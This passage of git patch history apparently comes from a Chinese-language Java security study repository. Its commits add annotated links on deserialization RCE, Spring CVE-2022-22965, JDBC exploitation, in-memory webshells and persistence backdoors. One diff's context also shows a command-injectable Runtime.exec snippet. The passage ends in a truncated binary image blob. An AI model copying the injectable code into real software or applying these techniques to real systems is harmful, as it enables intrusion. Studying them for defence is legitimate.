应用程序](https://blog.gdssecurity.com/labs/2017/10/10/pentesting-fast-infoset-based-web-applications-with-burp.html) **可能绕过xml** From a81dc98075b25ed06601298304969315454edc2c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 23 Mar 2022 00:58:38 +0800 Subject: [PATCH 014/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 82cb663..884dce9 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -110,3 +110,4 @@ + 2022/03/15 [Shiro后渗透拓展面](https://tttang.com/archive/1472/) **扩展了思路agnet dump 获得key!** + 2022/03/16 [通过ql发现java gadgets](https://www.synacktiv.com/publications/finding-gadgets-like-its-2022.html) **可以参考文章的思路,sink和source,和中间的链。** + 2022/03/20 [使用 Burp 测试基于快速信息集的 Web 应用程序](https://blog.gdssecurity.com/labs/2017/10/10/pentesting-fast-infoset-based-web-applications-with-burp.html) **可能绕过xml** ++ 2022/03/23 [Linux下文件描述符回显构造](http://foreversong.cn/archives/1459) **理论上linux系统都可以通过fd文件描述符去获得回显,不仅仅是java语言,在想能不能有什么办法准确的获得fd(考虑各个因素)** From dfbb05b3da81bbd2250f97faaf8591637d5bf3d6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 23 Mar 2022 21:55:15 +0800 Subject: [PATCH 015/332] Update Readme.md --- Dubbo/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Dubbo/Readme.md b/Dubbo/Readme.md index 22a00c8..83d0ac4 100644 --- a/Dubbo/Readme.md +++ b/Dubbo/Readme.md @@ -189,3 +189,8 @@ https://paper.seebug.org/1814/ ### Dubbo 2.7.8多个远程代码执行漏洞 https://xz.aliyun.com/t/8917 + +### CVE-2021-36162 + +[Apache Dubbo CVE-2021-36162 挖掘过程 +](https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&mid=2247487450&idx=1&sn=895a573a105cff858990df8bb88aafc5&chksm=c187cfcbf6f046ddbe75a826d851ebeafbcc7449e728a6be0e3ad60279ae7689ef14d4181757&mpshare=1&scene=23&srcid=0323KHKv3qtNyGs5a4jlCoz5&sharer_sharetime=1648033016703&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 935105488e6097385c9c1f6fad3592364bf83c24 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 28 Mar 2022 14:41:51 +0800 Subject: [PATCH 016/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 884dce9..2c16252 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -111,3 +111,4 @@ + 2022/03/16 [通过ql发现java gadgets](https://www.synacktiv.com/publications/finding-gadgets-like-its-2022.html) **可以参考文章的思路,sink和source,和中间的链。** + 2022/03/20 [使用 Burp 测试基于快速信息集的 Web 应用程序](https://blog.gdssecurity.com/labs/2017/10/10/pentesting-fast-infoset-based-web-applications-with-burp.html) **可能绕过xml** + 2022/03/23 [Linux下文件描述符回显构造](http://foreversong.cn/archives/1459) **理论上linux系统都可以通过fd文件描述符去获得回显,不仅仅是java语言,在想能不能有什么办法准确的获得fd(考虑各个因素)** ++ 2022/03/28 [内存Dump数据库密码的补充](https://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247488363&idx=2&sn=cd23ae6069ce67dd1884950e59654440&chksm=ce6bdcedf91c55fb423a02276007c5c964d5ee08f56643fb643fe977bdaf2e82f7e7f130be08&mpshare=1&scene=23&srcid=0328z7pucoel3CnkzthxIP2i&sharer_sharetime=1648427946090&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己想的一个思路是获得Statement对象的全部方法然后在方法之前hook就可以了,有亿点麻烦。。。** From 5559b98d4735822f1bacce263dc90a24e96def24 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 1 Apr 2022 23:06:01 +0800 Subject: [PATCH 017/332] Update Readme.md --- shell/SPEL/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/shell/SPEL/Readme.md b/shell/SPEL/Readme.md index 27a4c75..c83f309 100644 --- a/shell/SPEL/Readme.md +++ b/shell/SPEL/Readme.md @@ -104,6 +104,9 @@ print(')}') 防御方式是使用`SimpleEvaluationContext`来禁用其敏感的功能,从而阻止表达式注入执行问题的出现。 + +其他bypass: https://xz.aliyun.com/t/9245 + ## 参考 >https://www.cnblogs.com/bitterz/p/15206255.html From 5f50e7ae13026be79c0b8e70b136f90c683e568a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 2 Apr 2022 00:27:20 +0800 Subject: [PATCH 018/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 2c16252..97215fa 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -112,3 +112,4 @@ + 2022/03/20 [使用 Burp 测试基于快速信息集的 Web 应用程序](https://blog.gdssecurity.com/labs/2017/10/10/pentesting-fast-infoset-based-web-applications-with-burp.html) **可能绕过xml** + 2022/03/23 [Linux下文件描述符回显构造](http://foreversong.cn/archives/1459) **理论上linux系统都可以通过fd文件描述符去获得回显,不仅仅是java语言,在想能不能有什么办法准确的获得fd(考虑各个因素)** + 2022/03/28 [内存Dump数据库密码的补充](https://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247488363&idx=2&sn=cd23ae6069ce67dd1884950e59654440&chksm=ce6bdcedf91c55fb423a02276007c5c964d5ee08f56643fb643fe977bdaf2e82f7e7f130be08&mpshare=1&scene=23&srcid=0328z7pucoel3CnkzthxIP2i&sharer_sharetime=1648427946090&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己想的一个思路是获得Statement对象的全部方法然后在方法之前hook就可以了,有亿点麻烦。。。** ++ 2022/04/01 [Spring Framework CVE-2022-22965漏洞分析](https://wx.zsxq.com/dweb2/index/group/2212251881) From 4e9686c32ad73f1c551467d89febb8ed4d980f70 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 2 Apr 2022 13:12:19 +0800 Subject: [PATCH 019/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 97215fa..b1dc88f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -113,3 +113,4 @@ + 2022/03/23 [Linux下文件描述符回显构造](http://foreversong.cn/archives/1459) **理论上linux系统都可以通过fd文件描述符去获得回显,不仅仅是java语言,在想能不能有什么办法准确的获得fd(考虑各个因素)** + 2022/03/28 [内存Dump数据库密码的补充](https://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247488363&idx=2&sn=cd23ae6069ce67dd1884950e59654440&chksm=ce6bdcedf91c55fb423a02276007c5c964d5ee08f56643fb643fe977bdaf2e82f7e7f130be08&mpshare=1&scene=23&srcid=0328z7pucoel3CnkzthxIP2i&sharer_sharetime=1648427946090&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己想的一个思路是获得Statement对象的全部方法然后在方法之前hook就可以了,有亿点麻烦。。。** + 2022/04/01 [Spring Framework CVE-2022-22965漏洞分析](https://wx.zsxq.com/dweb2/index/group/2212251881) ++ 2022/04/02 [关于Spring framework rce(CVE-2022-22965)的一些问题思考](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247484213&idx=1&sn=f975b31111e3029fa92b098ffa5c7933&chksm=c2a1d7bcf5d65eaaf5b3ef13ec9147b77866511f07ef04b33c5d8e6897e93121b2fbe1c86efd&mpshare=1&scene=23&srcid=0402nGSU5SdMSCyU5rXBMkvD&sharer_sharetime=1648875678204&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **通俗易懂** From f61e21a43aa1c232dd7b721f0a4149bb1c52670d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 4 Apr 2022 00:02:11 +0800 Subject: [PATCH 020/332] Update Readme.md --- "java\345\233\236\346\230\276/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\233\236\346\230\276/Readme.md" "b/java\345\233\236\346\230\276/Readme.md" index b2202a8..7932c5c 100644 --- "a/java\345\233\236\346\230\276/Readme.md" +++ "b/java\345\233\236\346\230\276/Readme.md" @@ -318,3 +318,4 @@ org.springframework.webflow.context.ExternalContextHolder.getExternalContext() >[前尘——返回执行结果的回显链](https://www.anquanke.com/post/id/253661) > >[Weblogic使用ClassLoader和RMI来回显命令执行结果](https://xz.aliyun.com/t/7228) +>[JAVA反序列化回显学习](https://cangqingzhe.github.io/2020/12/17/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9B%9E%E6%98%BE%E5%AD%A6%E4%B9%A0/) From 4c85f1c4a5b92fff5a271abc0fb3cff3b3179170 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 5 Apr 2022 14:51:10 +0800 Subject: [PATCH 021/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b1dc88f..6bd854e 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -114,3 +114,4 @@ + 2022/03/28 [内存Dump数据库密码的补充](https://mp.weixin.qq.com/s?__biz=Mzg2NDM2MTE5Mw==&mid=2247488363&idx=2&sn=cd23ae6069ce67dd1884950e59654440&chksm=ce6bdcedf91c55fb423a02276007c5c964d5ee08f56643fb643fe977bdaf2e82f7e7f130be08&mpshare=1&scene=23&srcid=0328z7pucoel3CnkzthxIP2i&sharer_sharetime=1648427946090&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己想的一个思路是获得Statement对象的全部方法然后在方法之前hook就可以了,有亿点麻烦。。。** + 2022/04/01 [Spring Framework CVE-2022-22965漏洞分析](https://wx.zsxq.com/dweb2/index/group/2212251881) + 2022/04/02 [关于Spring framework rce(CVE-2022-22965)的一些问题思考](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247484213&idx=1&sn=f975b31111e3029fa92b098ffa5c7933&chksm=c2a1d7bcf5d65eaaf5b3ef13ec9147b77866511f07ef04b33c5d8e6897e93121b2fbe1c86efd&mpshare=1&scene=23&srcid=0402nGSU5SdMSCyU5rXBMkvD&sharer_sharetime=1648875678204&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **通俗易懂** ++ 2022/04/05 [JAVA RMI 反序列化流程原理分析](https://xz.aliyun.com/t/2223) **rmi攻击的回显思路,通过异常回显** From 162dd59bb951bc1b55bd391db6adc3dbbcddc7a9 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 7 Apr 2022 11:14:48 +0800 Subject: [PATCH 022/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6bd854e..a7254dc 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -115,3 +115,4 @@ + 2022/04/01 [Spring Framework CVE-2022-22965漏洞分析](https://wx.zsxq.com/dweb2/index/group/2212251881) + 2022/04/02 [关于Spring framework rce(CVE-2022-22965)的一些问题思考](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247484213&idx=1&sn=f975b31111e3029fa92b098ffa5c7933&chksm=c2a1d7bcf5d65eaaf5b3ef13ec9147b77866511f07ef04b33c5d8e6897e93121b2fbe1c86efd&mpshare=1&scene=23&srcid=0402nGSU5SdMSCyU5rXBMkvD&sharer_sharetime=1648875678204&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **通俗易懂** + 2022/04/05 [JAVA RMI 反序列化流程原理分析](https://xz.aliyun.com/t/2223) **rmi攻击的回显思路,通过异常回显** ++ 2022/04/07 [(先知首发)从Jenkins RCE看Groovy代码注入](https://www.mi1k7ea.com/2020/08/26/%E4%BB%8EJenkins-RCE%E7%9C%8BGroovy%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5) From 8db5c7b657acb28bc35e72c213e709fc7703ae5e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Apr 2022 17:45:46 +0800 Subject: [PATCH 023/332] Update Readme.md --- "java\345\206\205\345\255\230\351\251\254/Readme.md" | 3 +++ 1 file changed, 3 insertions(+) diff --git "a/java\345\206\205\345\255\230\351\251\254/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Readme.md" index bf4e168..6f317b8 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Readme.md" @@ -7,6 +7,9 @@ + [JavaWeb 内存马二周目通关攻略](https://su18.org/post/memory-shell-2/) + [【原创】利用“进程注入”实现无文件不死webshell](https://www.cnblogs.com/rebeyond/p/9686213.html) +## springboot ++ [利用 intercetor 注入 spring 内存 webshell](https://landgrey.me/blog/19/) + ## 后门 + [一种tomcat中间件留持久化后门的思路](https://gv7.me/articles/2021/an-idea-of-keeping-persistent-backdoor-in-tomcat-middleware/) From 1867756b8ca751eae95ccb30f037c57bc7c38a21 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Apr 2022 17:59:12 +0800 Subject: [PATCH 024/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index a7254dc..f4b5196 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -116,3 +116,4 @@ + 2022/04/02 [关于Spring framework rce(CVE-2022-22965)的一些问题思考](https://mp.weixin.qq.com/s?__biz=MzkzNjMxNDM0Mg==&mid=2247484213&idx=1&sn=f975b31111e3029fa92b098ffa5c7933&chksm=c2a1d7bcf5d65eaaf5b3ef13ec9147b77866511f07ef04b33c5d8e6897e93121b2fbe1c86efd&mpshare=1&scene=23&srcid=0402nGSU5SdMSCyU5rXBMkvD&sharer_sharetime=1648875678204&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **通俗易懂** + 2022/04/05 [JAVA RMI 反序列化流程原理分析](https://xz.aliyun.com/t/2223) **rmi攻击的回显思路,通过异常回显** + 2022/04/07 [(先知首发)从Jenkins RCE看Groovy代码注入](https://www.mi1k7ea.com/2020/08/26/%E4%BB%8EJenkins-RCE%E7%9C%8BGroovy%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5) ++ 2022/04/09 [Spring Boot拦截器(Interceptor)详解](https://juejin.cn/post/6844904020675559432) **注入interceptor的基础** From ecaa3e521547d69dd09b3daebc4385002884920a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 9 Apr 2022 19:14:36 +0800 Subject: [PATCH 025/332] Update Readme.md --- "java\345\206\205\345\255\230\351\251\254/Readme.md" | 3 +++ 1 file changed, 3 insertions(+) diff --git "a/java\345\206\205\345\255\230\351\251\254/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Readme.md" index 6f317b8..c44dec8 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Readme.md" @@ -10,6 +10,9 @@ ## springboot + [利用 intercetor 注入 spring 内存 webshell](https://landgrey.me/blog/19/) +## spring ++ [基于内存 Webshell 的无文件攻击技术研究](https://landgrey.me/blog/12/) + ## 后门 + [一种tomcat中间件留持久化后门的思路](https://gv7.me/articles/2021/an-idea-of-keeping-persistent-backdoor-in-tomcat-middleware/) From 116ba9c9d767e4cbf081900e83a2f1e5f93ff476 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 10 Apr 2022 17:14:17 +0800 Subject: [PATCH 026/332] Update Readme.md --- "java\345\206\205\345\255\230\351\251\254/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\345\206\205\345\255\230\351\251\254/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Readme.md" index c44dec8..b44acd1 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Readme.md" @@ -12,6 +12,7 @@ ## spring + [基于内存 Webshell 的无文件攻击技术研究](https://landgrey.me/blog/12/) ++ [前尘——内存中无处可寻的木马](https://www.anquanke.com/post/id/253475) ## 后门 + [一种tomcat中间件留持久化后门的思路](https://gv7.me/articles/2021/an-idea-of-keeping-persistent-backdoor-in-tomcat-middleware/) From 3659c6ff5b244f4194253979f3bf5cda1956e6ff Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 14 Apr 2022 11:52:16 +0800 Subject: [PATCH 027/332] Update Readme.md --- Jdbc/Readme.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/Jdbc/Readme.md b/Jdbc/Readme.md index 23848a2..a9a133a 100644 --- a/Jdbc/Readme.md +++ b/Jdbc/Readme.md @@ -2,3 +2,8 @@ >JDBC(Java DataBase Connectivity)是Java和数据库之间的一个桥梁,是一个 规范 而不是一个实现,能够执行SQL语句。它由一组用Java语言编写的类和接口组成。各种不同类型的数据库都有相应的实现。 + MySQL JDBC 客户端反序列化漏洞[参考文章](https://xz.aliyun.com/t/8159) [自己调试的漏洞点](./img/1.png) [自己调试的漏洞点](./img/2.png)**J简单的说:在JDBC连接MySQL的过程中,执行了SHOW SESSION STATUS语句。而如果我们控制返回的结果是一个恶意的对象,jdbc就会去执行readobject方法反序列化,从而有入口点,在利用cc链,完美rce。** + +## 其他利用 +jdbc 利用方式太多了,慢慢学习(重学) + ++ [由CVE-2022-21724引申jdbc漏洞](https://mp.weixin.qq.com/s?__biz=MzUzNDMyNjI3Mg==&mid=2247485275&idx=1&sn=e06b07579ecef87f8cce4536d25789ce&chksm=fa973a34cde0b322ef3949c2cf7fc6bf31e945674d2fe313a3dbf63504bdf737f05cba65de18&mpshare=1&scene=23&srcid=0414XqOEScLh3JIaaHk9pp4v&sharer_sharetime=1649906865169&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 6fca95ef35e73c7cc564eae25fad9c60a09dc64c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 16 Apr 2022 12:29:02 +0800 Subject: [PATCH 028/332] Update Readme.md --- shell/Readme.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/shell/Readme.md b/shell/Readme.md index b234df4..9f01e86 100644 --- a/shell/Readme.md +++ b/shell/Readme.md @@ -33,3 +33,6 @@ public void cmd(@RequestParam String command) throws Exception { Command = "ping 127.0.0.1"+request.getParameter("cmd"); Runtime.getRuntime().exec(command); ``` +## webshell 管理工具 + ++ [菜刀HTTP流量中转代理过WAF](https://xz.aliyun.com/t/2739) **现在来说就是bx和gsl了** From 36a6bca62f530bb333faa0d5795999e73b279d0e Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 19 Apr 2022 11:50:21 +0800 Subject: [PATCH 029/332] Add files via upload --- image.png | Bin 0 -> 218278 bytes 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 image.png diff --git a/image.png b/image.png new file mode 100644 index 0000000000000000000000000000000000000000..2fb9c1529890a496c6c4d52b113f5ca963239b25 GIT binary patch literal 218278 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 